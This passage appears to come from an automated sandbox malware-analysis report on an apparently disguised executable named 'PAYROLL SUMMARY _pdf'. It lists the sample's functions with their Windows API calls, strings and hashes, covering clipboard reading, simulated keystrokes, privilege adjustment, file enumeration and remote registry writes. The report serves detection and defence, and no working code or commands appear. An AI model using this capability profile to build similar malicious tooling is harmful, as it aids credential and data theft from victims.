String ID:
API String ID: 2597487223-0
Opcode ID: c9b417848030b7895b60a0d5ecee00162042aae1709192936d87344d20272af4
Instruction ID: d4c1556753a152f7ef34410491540ebeb8c0017998c2f72b2151c572eaa6ee25
Opcode Fuzzy Hash: c9b417848030b7895b60a0d5ecee00162042aae1709192936d87344d20272af4
Instruction Fuzzy Hash: 3EF0AF319A120AEBDF61BF748C0A79E76A1AF00329F04C514F42CAA1D1CB788A70DF51

Function 00254FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,003162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254FDE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 0b031d228b42d6d142b7b1f6d4681b7d43ad6a0926cbc779d14c0739d734c4a4
Instruction ID: 8d7642c9dbf47118efe5425cb8bd27d9acd2ed4db940083dd8e787b608685dda
Opcode Fuzzy Hash: 0b031d228b42d6d142b7b1f6d4681b7d43ad6a0926cbc779d14c0739d734c4a4
Instruction Fuzzy Hash: 59F03071525712CFC734AF68E494812FBE1BF0432A3208A3EE9DB82A10C77198A8DF54

Function 002709D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002709F4

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 4212307c855c711274544f1c640ff0ce68f55e3d6ce0cbdecfd644fc267a6b12
Instruction ID: cf6218e692e8685c8db2e22311af2965bb6ab4d6be07ff37f21b8a4fedb75c17
Opcode Fuzzy Hash: 4212307c855c711274544f1c640ff0ce68f55e3d6ce0cbdecfd644fc267a6b12
Instruction Fuzzy Hash: 63E0CD36D4522C57C720E658AC09FFA77EDDF88791F0401B6FC0CD7248E9709C918A94

Function 002B9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 002B914B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 230ffc75b2b22f34aa48cfa0f9f69f2394e5e73203f0d63bf8cc60681fb22294
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 46E092B0124B019FDB348E28D8107E373E0AB06315F00081DF29A83342EB6378919B59

Function 0027548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00275496

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: d636dcaa9a2545f698226f4ea514482b92241b73bb873e05ddaa0239f5330103
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: AAB0927684020C77DE012E92EC02A597B199B40678F808020FB0C18162A6B3A6B0AA89

Function 00270E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00270EF7

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: d3c8d695638a2084ab5fb2a1900bf36ef1d10a35266949a773dba4e5a9489507
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1831C170A20106DBC718DE58C4C0969F7A6FB59300B64CAA5E409CB651DB71EDE5CB80

Function 03DC22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 03DC22B1

Memory Dump Source

Source File: 00000000.00000002.2150148278.0000000003DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3dc0000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 133796c231430b893f341560960a1e62a42293f615108424ff0f198d62cf9434
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 04E0BF7494020E9FDB00EFA8D54969E7BB4EF04301F1005A5FD0192280D6309A508A62

Non-executed Functions

Function 002DCDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002DCE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DCE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002DCED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DCF00
SendMessageW.USER32 ref: 002DCF29
_wcsncpy.LIBCMT ref: 002DCFA1
GetKeyState.USER32(00000011), ref: 002DCFC2
GetKeyState.USER32(00000009), ref: 002DCFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DCFE5
GetKeyState.USER32(00000010), ref: 002DCFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DD018
SendMessageW.USER32 ref: 002DD03F
SendMessageW.USER32(?,00001030,?,002DB602), ref: 002DD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002DD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002DD16E
SetCapture.USER32(?), ref: 002DD177
ClientToScreen.USER32(?,?), ref: 002DD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002DD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002DD203
ReleaseCapture.USER32 ref: 002DD20E
GetCursorPos.USER32(?), ref: 002DD248
ScreenToClient.USER32(?,?), ref: 002DD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD2B1
SendMessageW.USER32 ref: 002DD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD31C
SendMessageW.USER32 ref: 002DD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002DD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 002DD37B
GetCursorPos.USER32(?), ref: 002DD39B
ScreenToClient.USER32(?,?), ref: 002DD3A8
GetParent.USER32(?), ref: 002DD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD431
SendMessageW.USER32 ref: 002DD462
ClientToScreen.USER32(?,?), ref: 002DD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002DD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD51A
SendMessageW.USER32 ref: 002DD53D
ClientToScreen.USER32(?,?), ref: 002DD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002DD5C3

Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC

GetWindowLongW.USER32(?,000000F0), ref: 002DD65F

Strings

F, xrefs: 002DD543
@GUI_DRAGID, xrefs: 002DD1AA
pr1, xrefs: 002DD1BD

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pr1
API String ID: 3977979337-427288994
Opcode ID: e7e340c03e3ff36d2e8c2a7e9cd57763e9888c4223c471b2a35953d0e485c425
Instruction ID: beaa1aa17ff84220dc7027b98c3c973cc80c844886a7cb2656439e218a70e918
Opcode Fuzzy Hash: e7e340c03e3ff36d2e8c2a7e9cd57763e9888c4223c471b2a35953d0e485c425
Instruction Fuzzy Hash: 41429C70519242AFC725CF68D848AAABBE9FF48314F24451EF656873A0C731DC64CF92

Function 002D804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 002D873F

Strings

%d/%02d/%02d, xrefs: 002D8478

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: e01f826b21c778638d101d9e65bc3b4364e200322b12788e582eb3e619297db9
Instruction ID: 27842e00674c81df5bedef5f07398a1829a1e732fb19cf61bafaa6837d89fb3b
Opcode Fuzzy Hash: e01f826b21c778638d101d9e65bc3b4364e200322b12788e582eb3e619297db9
Instruction Fuzzy Hash: 0112F371921245ABEB258F28DC49FAE7BB8EF45310F20416AF916DA2E0DF709D51CF50

Function 0026710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002675C2
_memset.LIBCMT ref: 002676B1
_memmove.LIBCMT ref: 00267C4B
_memmove.LIBCMT ref: 00267E4F

Strings

Q\E, xrefs: 002681C1
0w0, xrefs: 002A1F5B
Oa&, xrefs: 002A287E
[:<:]], xrefs: 002675F1
DEFINE, xrefs: 002A25AF
[:>:]], xrefs: 0026760A
\b(?<=\w), xrefs: 002A3C41
\b(?=\w), xrefs: 002A3C34

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove$_memset
String ID: 0w0$DEFINE$Oa&$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-2339167416
Opcode ID: f6de47ed5f63ea0f80736e1613be1a8379b8e53b4830d6abd9681b5fc01c79b2
Instruction ID: 678c59247b9a6dcb74713e14679f284645f3b76d0cfe30091bfeb04009b1cd93
Opcode Fuzzy Hash: f6de47ed5f63ea0f80736e1613be1a8379b8e53b4830d6abd9681b5fc01c79b2
Instruction Fuzzy Hash: D793A371E20216DFDB24CF58D8817ADB7B1FF49714F24816AE945EB280EBB09E91CB50

Function 00254A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00254A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0028DA8E
IsIconic.USER32(?), ref: 0028DA97
ShowWindow.USER32(?,00000009), ref: 0028DAA4
SetForegroundWindow.USER32(?), ref: 0028DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0028DAC4
GetCurrentThreadId.KERNEL32 ref: 0028DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0028DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0028DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0028DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0028DAF8
SetForegroundWindow.USER32(?), ref: 0028DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0028DB10
keybd_event.USER32(00000012,00000000), ref: 0028DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0028DB25
keybd_event.USER32(00000012,00000000), ref: 0028DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0028DB33
keybd_event.USER32(00000012,00000000), ref: 0028DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0028DB42
keybd_event.USER32(00000012,00000000), ref: 0028DB47
SetForegroundWindow.USER32(?), ref: 0028DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0028DB71

Strings

Shell_TrayWnd, xrefs: 0028DA89

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 42c6e06d8947184dec322d2979118277cd74e1ee19ab594bd5ece65ad2a6085a
Instruction ID: efdce47a8ccc10a3d85cd626a3e61f78afea90d12d712b030a20628a551b6408
Opcode Fuzzy Hash: 42c6e06d8947184dec322d2979118277cd74e1ee19ab594bd5ece65ad2a6085a
Instruction Fuzzy Hash: 0631B375E91318BBEB206F61AD49F7E3F6CEB44B50F104066FA01E61D1C6B05D10ABA4

Function 002A8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 002A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A8D0D
Part of subcall function 002A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8D3A
Part of subcall function 002A8CC3: GetLastError.KERNEL32 ref: 002A8D47

_memset.LIBCMT ref: 002A889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002A88ED
CloseHandle.KERNEL32(?), ref: 002A88FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002A8915
GetProcessWindowStation.USER32 ref: 002A892E
SetProcessWindowStation.USER32(00000000), ref: 002A8938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002A8952

Part of subcall function 002A8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8851), ref: 002A8728
Part of subcall function 002A8713: CloseHandle.KERNEL32(?,?,002A8851), ref: 002A873A

Strings

default, xrefs: 002A894D
, xrefs: 002A88AA
winsta0, xrefs: 002A8910

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: d1d4e6ad48c5dcc9ac561571e09355ba5ae108f698127809cc8d7bf1a2ef2890
Instruction ID: 957b460e0304ba4633f58817e4cd6c5ab7cc4181d2c3da3b18a8745010653227
Opcode Fuzzy Hash: d1d4e6ad48c5dcc9ac561571e09355ba5ae108f698127809cc8d7bf1a2ef2890
Instruction Fuzzy Hash: F5815E71D1120AAFDF11DFA4DD49AEEBB78EF05304F08416AF915A6161DF318E24DB60

Function 002C425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(002DF910), ref: 002C4284
IsClipboardFormatAvailable.USER32(0000000D), ref: 002C4292
GetClipboardData.USER32(0000000D), ref: 002C429A
CloseClipboard.USER32 ref: 002C42A6
GlobalLock.KERNEL32(00000000), ref: 002C42C2
CloseClipboard.USER32 ref: 002C42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 002C42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 002C42EE
GetClipboardData.USER32(00000001), ref: 002C42F6
GlobalLock.KERNEL32(00000000), ref: 002C4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 002C4337
CloseClipboard.USER32 ref: 002C4447

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: e800cabbba4ec79d97f37797c1de310d8380f6fbdbf3839f8339863211828ae4
Instruction ID: 2d809eb0ae6d67a148baff834220b1f9b66b559880a20d9c36cd44bf2ef82927
Opcode Fuzzy Hash: e800cabbba4ec79d97f37797c1de310d8380f6fbdbf3839f8339863211828ae4
Instruction Fuzzy Hash: DA519031614302ABD311FF60ED9AF6F77A8AF84B01F10462EF956D21A1DB70DD148B6A

Function 002BC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002BC9F8
FindClose.KERNEL32(00000000), ref: 002BCA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BCA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BCA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 002BCAAF
__swprintf.LIBCMT ref: 002BCAFB
__swprintf.LIBCMT ref: 002BCB3E

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

__swprintf.LIBCMT ref: 002BCB92

Part of subcall function 002738D8: __woutput_l.LIBCMT ref: 00273931

__swprintf.LIBCMT ref: 002BCBE0

Part of subcall function 002738D8: __flsbuf.LIBCMT ref: 00273953
Part of subcall function 002738D8: __flsbuf.LIBCMT ref: 0027396B

__swprintf.LIBCMT ref: 002BCC2F
__swprintf.LIBCMT ref: 002BCC7E
__swprintf.LIBCMT ref: 002BCCCD

Strings

%4d, xrefs: 002BCB38
%4d%02d%02d%02d%02d%02d, xrefs: 002BCAF5
%02d, xrefs: 002BCB86, 002BCB90, 002BCBDE, 002BCC2D, 002BCC7C, 002BCCCB

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 77022fc9b5161fb9fd3cc324baa7e4f06209bd1fb9af84be79bcfe27d62d532c
Instruction ID: 55c0c1c0d98a23030d6c16b583fe3dc095a039adafc9f00083866654603afc37
Opcode Fuzzy Hash: 77022fc9b5161fb9fd3cc324baa7e4f06209bd1fb9af84be79bcfe27d62d532c
Instruction Fuzzy Hash: DBA13EB1428305ABC700EF64D995DAFB7ECFF98701F404929B986C3191EB34DA58CB66

Function 002BF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002BF221
_wcscmp.LIBCMT ref: 002BF236
_wcscmp.LIBCMT ref: 002BF24D
GetFileAttributesW.KERNEL32(?), ref: 002BF25F
SetFileAttributesW.KERNEL32(?,?), ref: 002BF279
FindNextFileW.KERNEL32(00000000,?), ref: 002BF291
FindClose.KERNEL32(00000000), ref: 002BF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 002BF2B8
_wcscmp.LIBCMT ref: 002BF2DF
_wcscmp.LIBCMT ref: 002BF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 002BF308
SetCurrentDirectoryW.KERNEL32(0030A5A0), ref: 002BF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF330
FindClose.KERNEL32(00000000), ref: 002BF33D
FindClose.KERNEL32(00000000), ref: 002BF34F

Strings

*.*, xrefs: 002BF2B3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: aa4233322d4255a521576d8198fd9459d9cef51ec3f142355394e3582323fc4c
Instruction ID: 4b1aeb34790adddb45aa909c11cd234c34f9daf1a32c91e17f242503dcd6e202
Opcode Fuzzy Hash: aa4233322d4255a521576d8198fd9459d9cef51ec3f142355394e3582323fc4c
Instruction Fuzzy Hash: F631263691124A6ADB90DFB4ED5DAEEB3ECAF093A0F1441B6E845D3090EB30DE50CA54

Function 002D0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,002DF910,00000000,?,00000000,?,?), ref: 002D0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002D0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002D0D1D
RegCloseKey.ADVAPI32(?), ref: 002D103D
RegCloseKey.ADVAPI32(00000000), ref: 002D104A

Strings

REG_SZ, xrefs: 002D0D5B
REG_MULTI_SZ, xrefs: 002D0E05
REG_BINARY, xrefs: 002D0FD8
REG_QWORD, xrefs: 002D0F8B
REG_EXPAND_SZ, xrefs: 002D0CBA
REG_DWORD, xrefs: 002D0F0E

Memory Dump Source

